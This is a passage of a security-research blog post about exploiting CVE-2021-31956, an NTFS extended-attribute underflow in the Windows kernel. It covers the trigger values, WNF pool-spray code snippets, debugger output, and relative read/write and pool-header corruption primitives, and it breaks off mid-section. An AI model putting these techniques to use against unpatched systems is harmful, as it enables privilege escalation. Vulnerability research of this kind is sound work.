🔒
There are new articles available, click to refresh the page.
Before yesterdayNCC Group Research

CVE-2021-31956 Exploiting the Windows Kernel (NTFS with WNF) – Part 1

15 July 2021 at 12:07

Introduction

Recently I decided to take a look at CVE-2021-31956, a local privilege escalation within Windows due to a kernel memory corruption bug which was patched within the June 2021 Patch Tuesday.

Microsoft describe the vulnerability within their advisory document, which notes many versions of Windows being affected and in-the-wild exploitation of the issue being used in targeted attacks. The exploit was found in the wild by https://twitter.com/oct0xor of Kaspersky.

Kaspersky produced a nice summary of the vulnerability and describe briefly how the bug was exploited in the wild.

As I did not have access to the exploit (unlike Kaspersky?), I attempted to exploit this vulnerability on Windows 10 20H2 to determine the ease of exploitation and to understand the challenges attackers face when writing a modern kernel pool exploits for Windows 10 20H2 and onwards.

One thing that stood out to me was the mention of the Windows Notification Framework (WNF) used by the in-the-wild attackers to enable novel exploit primitives. This lead to further investigation into how this could be used to aid exploitation in general. The findings I present below are obviously speculation based on likely uses of WNF by an attacker. I look forward to seeing the Kaspersky write-up to determine if my assumptions on how this feature could be leveraged are correct!

This blog post is the first in the series and will describe the vulnerability, the initial constraints from an exploit development perspective and finally how WNF can be abused to obtain a number of exploit primitives. The blogs will also cover exploit mitigation challenges encountered along the way, which make writing modern pool exploits more difficult on the most recent versions of Windows.

Future blog posts will describe improvements which can be made to an exploit to enhance reliability, stability and clean-up afterwards.

Vulnerability Summary

As there was already a nice summary produced by Kaspersky it was trivial to locate the vulnerable code inside the ntfs.sys driver’s NtfsQueryEaUserEaList function:

The backing structure in this case is _FILE_FULL_EA_INFORMATION.

Basically the code above loops through each NTFS extended attribute (Ea) for a file and copies from the Ea Block into the output buffer based on the size of ea_block->EaValueLength + ea_block->EaNameLength + 9.

There is a check to ensure that the ea_block_size is less than or equal to out_buf_length - padding.

The out_buf_length is then decremented by the size of the ea_block_size and its padding.

The padding is calculated by ((ea_block_size + 3) & 0xFFFFFFFC) - ea_block_size;

This is because each Ea Block should be padded to be 32-bit aligned.

Putting some example numbers into this, lets assume the following: There are two extended attributes within the extended attributes for the file.

At the first iteration of the loop we could have the following values:

EaNameLength = 5
EaValueLength = 4

ea_block_size = 9 + 5 + 4 = 18
padding = 0

So assuming that 18 < out_buf_length - 0, data would be copied into the buffer. We will use 30 for this example.

out_buf_length = 30 - 18 + 0
out_buf_length = 12 // we would have 12 bytes left of the output buffer.

padding = ((18+3) & 0xFFFFFFFC) - 18
padding = 2

We could then have a second extended attribute in the file with the same values :

EaNameLength = 5
EaValueLength = 4

ea_block_size = 9 + 5 + 4 = 18

At this point padding is 2, so the calculation is:

18 <= 12 - 2 // is False.

Therefore, the second memory copy would correctly not occur due to the buffer being too small.

However, consider the scenario when we have the following setup if we could have the out_buf_length of 18.

First extended attribute:

EaNameLength = 5
EaValueLength = 4

Second extended attribute:

EaNameLength = 5
EaValueLength = 47

First iteration the loop:

EaNameLength = 5
EaValueLength = 4

ea_block_size = 9 + 5 + 4 // 18
padding = 0

The resulting check is:

18 <= 18 - 0 // is True and a copy of 18 occurs.
out_buf_length = 18 - 18 + 0 
out_buf_length = 0 // We would have 0 bytes left of the output buffer.

padding = ((18+3) & 0xFFFFFFFC) - 18
padding = 2

Our second extended attribute with the following values:

EaNameLength = 5
EaValueLength = 47

ea_block_size = 5 + 47 + 9
ea_block_size = 137

In the resulting check will be:

ea_block_size <= out_buf_length - padding

137 <= 0 - 2

And at this point we have underflowed the check and 137 bytes will be copied off the end of the buffer, corrupting the adjacent memory.

Looking at the caller of this function NtfsCommonQueryEa, we can see the output buffer is allocated on the paged pool based on the size requested:

By looking at the callers for NtfsCommonQueryEa we can see that we can see that NtQueryEaFile system call path triggers this code path to reach the vulnerable code.

The documentation for the Zw version of this syscall function is here.

We can see that the output buffer Buffer is passed in from userspace, together with the Length of this buffer. This means we end up with a controlled size allocation in the kernel space based on the size of the buffer. However, to trigger this vulnerability, we need to trigger an underflow as described as above.

In order to do trigger the underflow, we need to set our output buffer size to be length of the first Ea Block.

Providing we are padding the allocation, the second Ea Block will be written out of bounds of the buffer when the second Ea Block is queried.

The interesting things from this vulnerability from an attacker perspective are:

1) The attacker can control the data which is used within the overflow and the size of the overflow. Extended attribute values do not constrain the values which they can contain.
2) The overflow is linear and will corrupt any adjacent pool chunks.
3) The attacker has control over the size of the pool chunk allocated.

However, the question is can this be exploited reliably in the presence of modern kernel pool mitigations and is this a “good” memory corruption:

What makes a good memory corruption.

Triggering the corruption

So how do we construct a file containing NTFS extended attributes which will lead to the vulnerability being triggered when NtQueryEaFile is called?

The function NtSetEaFile has the Zw version documented here.

The Buffer parameter here is “a pointer to a caller-supplied, FILE_FULL_EA_INFORMATION-structured input buffer that contains the extended attribute values to be set”.

Therefore, using the values above, the first extended attribute occupies the space within the buffer between 0-18.

There is then the padding length of 2, with the second extended attribute starting at 20 offset.

typedef struct _FILE_FULL_EA_INFORMATION {
  ULONG  NextEntryOffset;
  UCHAR  Flags;
  UCHAR  EaNameLength;
  USHORT EaValueLength;
  CHAR   EaName[1];
} FILE_FULL_EA_INFORMATION, *PFILE_FULL_EA_INFORMATION;

The key thing here is that NextEntryOffset of the first EA block is set to the offset of the overflowing EA including the padding position (20). Then for the overflowing EA block the NextEntryOffset is set to 0 to end the chain of extended attributes being set.

This means constructing two extended attributes, where the first extended attribute block is the size in which we want to allocate our vulnerable buffer (minus the pool header). The second extended attribute block is set to the overflow data.

If we set our first extended attribute block to be exactly the size of the Length parameter passed in NtQueryEaFile then, provided there is padding, the check will be underflowed and the second extended attribute block will allow copy of an attacker-controlled size.

So in summary, once the extended attributes have been written to the file using NtSetEaFile. It is then necessary to trigger the vulnerable code path to act on them by setting the outbuffer size to be exactly the same size as our first extended attribute using NtQueryEaFile.

Understanding the kernel pool layout on Windows 10

The next thing we need to understand is how kernel pool memory works. There is plenty of older material on kernel pool exploitation on older versions of Windows, however, not very much on recent versions of Windows 10 (19H1 and up). There has been significant changes with bringing userland Segment Heap concepts to the Windows kernel pool. I highly recommend reading Scoop the Windows 10 Pool! by Corentin Bayet and Paul Fariello from Synacktiv for a brilliant paper on this and proposing some initial techniques. Without this paper being published already, exploitation of this issue would have been significantly harder.

Firstly the important thing to understand is to determine where in memory the vulnerable pool chunk is allocated and what the surrounding memory looks like. We determine what heap structure in which the chunk lives on from the four “backends”:

  • Low Fragmentation Heap (LFH)
  • Variable Size Heap (VS)
  • Segment Allocation
  • Large Alloc

I started off using the NtQueryEaFile parameter Length value above of 0x12 to end up with a vulnerable chunk of sized 0x30 allocated on the LFH as follows:

Pool page ffff9a069986f3b0 region is Paged pool
 ffff9a069986f010 size:   30 previous size:    0  (Allocated)  Ntf0
 ffff9a069986f040 size:   30 previous size:    0  (Free)       ....
 ffff9a069986f070 size:   30 previous size:    0  (Free)       ....
 ffff9a069986f0a0 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f0d0 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f100 size:   30 previous size:    0  (Allocated)  Luaf
 ffff9a069986f130 size:   30 previous size:    0  (Free)       SeSd
 ffff9a069986f160 size:   30 previous size:    0  (Free)       SeSd
 ffff9a069986f190 size:   30 previous size:    0  (Allocated)  Ntf0
 ffff9a069986f1c0 size:   30 previous size:    0  (Free)       SeSd
 ffff9a069986f1f0 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f220 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f250 size:   30 previous size:    0  (Allocated)  Ntf0
 ffff9a069986f280 size:   30 previous size:    0  (Free)       SeGa
 ffff9a069986f2b0 size:   30 previous size:    0  (Free)       Ntf0
 ffff9a069986f2e0 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f310 size:   30 previous size:    0  (Allocated)  Ntf0
 ffff9a069986f340 size:   30 previous size:    0  (Free)       SeSd
 ffff9a069986f370 size:   30 previous size:    0  (Free)       APpt
*ffff9a069986f3a0 size:   30 previous size:    0  (Allocated) *NtFE
    Pooltag NtFE : Ea.c, Binary : ntfs.sys
 ffff9a069986f3d0 size:   30 previous size:    0  (Allocated)  Ntf0
 ffff9a069986f400 size:   30 previous size:    0  (Free)       SeSd
 ffff9a069986f430 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f460 size:   30 previous size:    0  (Free)       SeUs
 ffff9a069986f490 size:   30 previous size:    0  (Free)       SeGa

This is due to the size of the allocation fitting being below 0x200.

We can step through the corruption of the adjacent chunk occurring by settings a conditional breakpoint on the following location:

bp Ntfs!NtfsQueryEaUserEaList "j @r12 != 0x180 & @r12 != 0x10c & @r12 != 0x40 '';'gc'" then breakpointing on the memcpy location.

This example ignores some common sizes which are often hit on 20H2, as this code path is used by the system often under normal operation.

It should be mentioned that I initially missed the fact that the attacker has good control over the size of the pool chunk initially and therefore went down the path of constraining myself to an expected chunk size of 0x30. This constraint was not actually true, however, demonstrates that even with more restricted attacker constraints these can often be worked around and that you should always try to understand the constraints of your bug fully before jumping into exploitation 🙂

By analyzing the vulnerable NtFE allocation, we can see we have the following memory layout:

!pool @r9
*ffff8001668c4d80 size:   30 previous size:    0  (Allocated) *NtFE
    Pooltag NtFE : Ea.c, Binary : ntfs.sys
 ffff8001668c4db0 size:   30 previous size:    0  (Free)       C...

1: kd> dt !_POOL_HEADER ffff8001668c4d80
nt!_POOL_HEADER
   +0x000 PreviousSize     : 0y00000000 (0)
   +0x000 PoolIndex        : 0y00000000 (0)
   +0x002 BlockSize        : 0y00000011 (0x3)
   +0x002 PoolType         : 0y00000011 (0x3)
   +0x000 Ulong1           : 0x3030000
   +0x004 PoolTag          : 0x4546744e
   +0x008 ProcessBilled    : 0x0057005c`007d0062 _EPROCESS
   +0x008 AllocatorBackTraceIndex : 0x62
   +0x00a PoolTagHash      : 0x7d

Followed by 0x12 bytes of the data itself.

This means that chunk size calculation will be, 0x12 + 0x10 = 0x22, with this then being rounded up to the 0x30 segment chunk size.

We can however also adjust both the size of the allocation and the amount of data we will overflow.

As an alternative example, using the following values overflows from a chunk of 0x70 into the adjacent pool chunk (debug output is taken from testing code):

NtCreateFile is located at 0x773c2f20 in ntdll.dll
RtlDosPathNameToNtPathNameN is located at 0x773a1bc0 in ntdll.dll
NtSetEaFile is located at 0x773c42e0 in ntdll.dll
NtQueryEaFile is located at 0x773c3e20 in ntdll.dll
WriteEaOverflow EaBuffer1->NextEntryOffset is 96
WriteEaOverflow EaLength1 is 94
WriteEaOverflow EaLength2 is 59
WriteEaOverflow Padding is 2
WriteEaOverflow ea_total is 155
NtSetEaFileN sucess
output_buf_size is 94
GetEa2 pad is 1
GetEa2 Ea1->NextEntryOffset is 12
GetEa2 EaListLength is 31
GetEa2 out_buf_length is 94

This ends up being allocated within a 0x70 byte chunk:

ffffa48bc76c2600 size:   70 previous size:    0  (Allocated)  NtFE

As you can see it is therefore possible to influence the size of the vulnerable chunk.

At this point, we need to determine if it is possible to allocate adjacent chunks of a useful size class which can be overflowed into, to gain exploit primitives, as well as how to manipulate the paged pool to control the layout of these allocations (feng shui).

Much less has been written on Windows Paged Pool manipulation than Non-Paged pool and to our knowledge nothing at all has been publicly written about using WNF structures for exploitation primitives so far.

WNF Introduction

The Windows Notification Facitily is a notification system within Windows which implements a publisher/subscriber model for delivering notifications.

Great previous research has been performed by Alex Ionescu and Gabrielle Viala documenting how this feature works and is designed.

I don’t want to duplicate the background here, so I recommend reading the following documents first to get up to speed:

Having a good grounding in the above research will allow a better understanding of how WNF related structures used by Windows.

Controlled Paged Pool Allocation

One of the first important things for kernel pool exploitation is being able to control the state of the kernel pool to be able to obtain a memory layout desired by the attacker.

There has been plenty of previous research into non-paged pool and the session pool, however, less from a paged pool perspective. As this overflow is occurring within the paged pool, then we need to find exploit primitives allocated within this pool.

Now after some reversing of WNF, it was determined that the majority of allocations used within this feature use memory from the paged pool.

I started off by looking through the primary structures associated with this feature and what could be controlled from userland.

One of the first things which stood out to me was that the actual data used for notifications is stored after the following structure:

nt!_WNF_STATE_DATA
   +0x000 Header           : _WNF_NODE_HEADER
   +0x004 AllocatedSize    : Uint4B
   +0x008 DataSize         : Uint4B
   +0x00c ChangeStamp      : Uint4B

Which is pointed at by the WNF_NAME_INSTANCE structure’s StateData pointer:

nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF
   +0x010 TreeLinks        : _RTL_BALANCED_NODE
   +0x028 StateName        : _WNF_STATE_NAME_STRUCT
   +0x030 ScopeInstance    : Ptr64 _WNF_SCOPE_INSTANCE
   +0x038 StateNameInfo    : _WNF_STATE_NAME_REGISTRATION
   +0x050 StateDataLock    : _WNF_LOCK
   +0x058 StateData        : Ptr64 _WNF_STATE_DATA
   +0x060 CurrentChangeStamp : Uint4B
   +0x068 PermanentDataStore : Ptr64 Void
   +0x070 StateSubscriptionListLock : _WNF_LOCK
   +0x078 StateSubscriptionListHead : _LIST_ENTRY
   +0x088 TemporaryNameListEntry : _LIST_ENTRY
   +0x098 CreatorProcess   : Ptr64 _EPROCESS
   +0x0a0 DataSubscribersCount : Int4B
   +0x0a4 CurrentDeliveryCount : Int4B

Looking at the function NtUpdateWnfStateData we can see that this can be used for controlled size allocations within the paged pool, and can be used to store arbitrary data.

The following allocation occurs within ExpWnfWriteStateData, which is called from NtUpdateWnfStateData:

v19 = ExAllocatePoolWithQuotaTag((POOL_TYPE)9, (unsigned int)(v6 + 16), 0x20666E57u);

Looking at the prototype of the function:

We can see that the argument Length is our v6 value 16 (the 0x10-byte header prepended).

Therefore, we have (0x10-bytes of _POOL_HEADER) header as follows:

1: kd> dt _POOL_HEADER
nt!_POOL_HEADER
   +0x000 PreviousSize     : Pos 0, 8 Bits
   +0x000 PoolIndex        : Pos 8, 8 Bits
   +0x002 BlockSize        : Pos 0, 8 Bits
   +0x002 PoolType         : Pos 8, 8 Bits
   +0x000 Ulong1           : Uint4B
   +0x004 PoolTag          : Uint4B
   +0x008 ProcessBilled    : Ptr64 _EPROCESS
   +0x008 AllocatorBackTraceIndex : Uint2B
   +0x00a PoolTagHash      : Uint2B

followed by the _WNF_STATE_DATA of size 0x10:

nt!_WNF_STATE_DATA
   +0x000 Header           : _WNF_NODE_HEADER
   +0x004 AllocatedSize    : Uint4B
   +0x008 DataSize         : Uint4B
   +0x00c ChangeStamp      : Uint4B

With the arbitrary-sized data following the structure.

To track the allocations we make using this function we can use:

nt!ExpWnfWriteStateData "j @r8 = 0x100 '';'gc'"

We can then construct an allocation method which creates a new state name and performs our allocation:

NtCreateWnfStateName(&state, WnfTemporaryStateName, WnfDataScopeMachine, FALSE, 0, 0x1000, psd);
NtUpdateWnfStateData(&state, buf, alloc_size, 0, 0, 0, 0);

Using this we can spray controlled sizes within the paged pool and fill it with controlled objects:

1: kd> !pool ffffbe0f623d7190
Pool page ffffbe0f623d7190 region is Paged pool
 ffffbe0f623d7020 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7050 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7080 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d70b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d70e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7110 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7140 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
*ffffbe0f623d7170 size:   30 previous size:    0  (Allocated) *Wnf  Process: ffff87056ccc0080
        Pooltag Wnf  : Windows Notification Facility, Binary : nt!wnf
 ffffbe0f623d71a0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d71d0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7200 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7230 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7260 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7290 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d72c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d72f0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7320 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7350 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7380 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d73b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d73e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7410 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7440 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7470 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d74a0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d74d0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7500 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7530 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7560 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7590 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d75c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d75f0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7620 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7650 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7680 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d76b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d76e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7710 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7740 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7770 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d77a0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d77d0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7800 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7830 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7860 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7890 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d78c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d78f0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7920 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7950 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7980 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d79b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d79e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7a10 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7a40 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7a70 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7aa0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7ad0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7b00 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7b30 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7b60 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7b90 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7bc0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7bf0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7c20 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7c50 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7c80 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7cb0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7ce0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7d10 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7d40 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7d70 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7da0 size:   30 previous size:    0  (Allocated)  Ntf0
 ffffbe0f623d7dd0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7e00 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7e30 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7e60 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7e90 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7ec0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7ef0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7f20 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7f50 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7f80 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7fb0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080

This is useful for filling the pool with data of a controlled size and data, and we continue our investigation of the WNF feature.

Controlled Free

The next thing which would be useful from an exploit perspective would be the ability to free WNF chunks on demand within the paged pool.

There’s also an API call which does this called NtDeleteWnfStateData, which calls into ExpWnfDeleteStateData in turn ends up free’ing our allocation.

Whilst researching this area, I was able to reuse the free’d chunk straight away with a new allocation. More investigation is needed to determine if the LFH makes use of delayed free lists as in my case from empirical testing, then I did not seem to be hitting this after a large spray of Wnf chunks.

Relative Memory Read

Now we have the ability to perform both a controlled allocation and free, but what about the data, itself and can we do anything useful with it?

Well, looking back at the structure, you may well have spotted that the AllocatedSize and DataSize are contained within it:

nt!_WNF_STATE_DATA
   +0x000 Header           : _WNF_NODE_HEADER
   +0x004 AllocatedSize    : Uint4B
   +0x008 DataSize         : Uint4B
   +0x00c ChangeStamp      : Uint4B

The DataSize is to denote the size of the actual data following the structure within memory and is used for bounds checking within the NtQueryWnfStateData function. The actual memory copy operation takes place in the function ExpWnfReadStateData:

So the obvious thing here is that if we can corrupt DataSize then this will give relative kernel memory disclosure.

I say relative because the _WNF_STATE_DATA structure is pointed at by the StateData pointer of the _WNF_NAME_INSTANCE which it is associated with:

nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF
   +0x010 TreeLinks        : _RTL_BALANCED_NODE
   +0x028 StateName        : _WNF_STATE_NAME_STRUCT
   +0x030 ScopeInstance    : Ptr64 _WNF_SCOPE_INSTANCE
   +0x038 StateNameInfo    : _WNF_STATE_NAME_REGISTRATION
   +0x050 StateDataLock    : _WNF_LOCK
   +0x058 StateData        : Ptr64 _WNF_STATE_DATA
   +0x060 CurrentChangeStamp : Uint4B
   +0x068 PermanentDataStore : Ptr64 Void
   +0x070 StateSubscriptionListLock : _WNF_LOCK
   +0x078 StateSubscriptionListHead : _LIST_ENTRY
   +0x088 TemporaryNameListEntry : _LIST_ENTRY
   +0x098 CreatorProcess   : Ptr64 _EPROCESS
   +0x0a0 DataSubscribersCount : Int4B
   +0x0a4 CurrentDeliveryCount : Int4B

Having this relative read now allows disclosure of other adjacent objects within the pool. Some output as an example from my code:

found corrupted element changeTimestamp 54545454 at index 4972
len is 0xff
41 41 41 41 42 42 42 42  43 43 43 43 44 44 44 44  |  AAAABBBBCCCCDDDD
00 00 03 0B 57 6E 66 20  E0 56 0B C7 F9 97 D9 42  |  ....Wnf .V.....B
04 09 10 00 10 00 00 00  10 00 00 00 01 00 00 00  |  ................
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |  AAAAAAAAAAAAAAAA
00 00 03 0B 57 6E 66 20  D0 56 0B C7 F9 97 D9 42  |  ....Wnf .V.....B
04 09 10 00 10 00 00 00  10 00 00 00 01 00 00 00  |  ................
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |  AAAAAAAAAAAAAAAA
00 00 03 0B 57 6E 66 20  80 56 0B C7 F9 97 D9 42  |  ....Wnf .V.....B
04 09 10 00 10 00 00 00  10 00 00 00 01 00 00 00  |  ................
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |  AAAAAAAAAAAAAAAA
00 00 03 03 4E 74 66 30  70 76 6B D8 F9 97 D9 42  |  ....Ntf0pvk....B
60 D6 55 AA 85 B4 FF FF  01 00 00 00 00 00 00 00  |  `.U.............
7D B0 29 01 00 00 00 00  41 41 41 41 41 41 41 41  |  }.).....AAAAAAAA
00 00 03 0B 57 6E 66 20  20 76 6B D8 F9 97 D9 42  |  ....Wnf  vk....B
04 09 10 00 10 00 00 00  10 00 00 00 01 00 00 00  |  ................
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41     |  AAAAAAAAAAAAAAA

At this point there are many interesting things which can be leaked out, especially considering that the both the NTFS vulnerable chunk and the WNF chunk can be positioned with other interesting objects. Items such as the ProcessBilled field can also be leaked using this technique.

We can also use the ChangeStamp value to determine which of our objects is corrupted when spraying the pool with _WNF_STATE_DATA objects.

Relative Memory Write

So what about writing data outside the bounds?

Taking a look at the NtUpdateWnfStateData function, we end up with an interesting call: ExpWnfWriteStateData((__int64)nameInstance, InputBuffer, Length, MatchingChangeStamp, CheckStamp);. Below shows some of the contents of the ExpWnfWriteStateData function:

We can see that if we corrupt the AllocatedSize, represented by v12[1] in the code above, so that it is bigger than the actual size of the data, then the existing allocation will be used and a memcpy operation will corrupt further memory.

So at this point its worth noting that the relative write has not really given us anything more than we had already with the NTFS overflow. However, as the data can be both read and written back using this technique then it opens up the ability to read data, modify certain parts of it and write it back.

_POOL_HEADER BlockSize Corruption to Arbitrary Read using Pipe Attributes

As mentioned previously, when I first started investigating this vulnerability, I was under the impression that the pool chunk needed to be very small in order to trigger the underflow, but this wrong assumption lead to me trying to pivot to pool chunks of a more interesting variety. By default, within the 0x30 chunk segment alone, I could not find any interesting objects which could be used to achieve arbitrary read.

Therefore my approach was to use the NTFS overflow to corrupt the BlockSize of a 0x30 sized chunk WNF _POOL_HEADER.

nt!_POOL_HEADER
   +0x000 PreviousSize     : 0y00000000 (0)
   +0x000 PoolIndex        : 0y00000000 (0)
   +0x002 BlockSize        : 0y00000011 (0x3)
   +0x002 PoolType         : 0y00000011 (0x3)
   +0x000 Ulong1           : 0x3030000
   +0x004 PoolTag          : 0x4546744e
   +0x008 ProcessBilled    : 0x0057005c`007d0062 _EPROCESS
   +0x008 AllocatorBackTraceIndex : 0x62
   +0x00a PoolTagHash      : 0x7d

By ensuring that the PoolQuota bit of the PoolType is not set, we can avoid any integrity checks for when the chunk is freed.

By setting the BlockSize to a different size, once the chunk is free’d using our controlled free, we can force the chunks address to be stored within the wrong lookaside list for the size.

Then we can reallocate another object of a different size, matching the size we used when corrupting the chunk now placed on that lookaside list, to take the place of this object.

Finally, we can then trigger corruption again and therefore corrupt our more interesting object.

Initially I demonstrated this being possible using another WNF chunk of size 0x220:

1: kd> !pool @rax
Pool page ffff9a82c1cd4a30 region is Paged pool
 ffff9a82c1cd4000 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4030 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
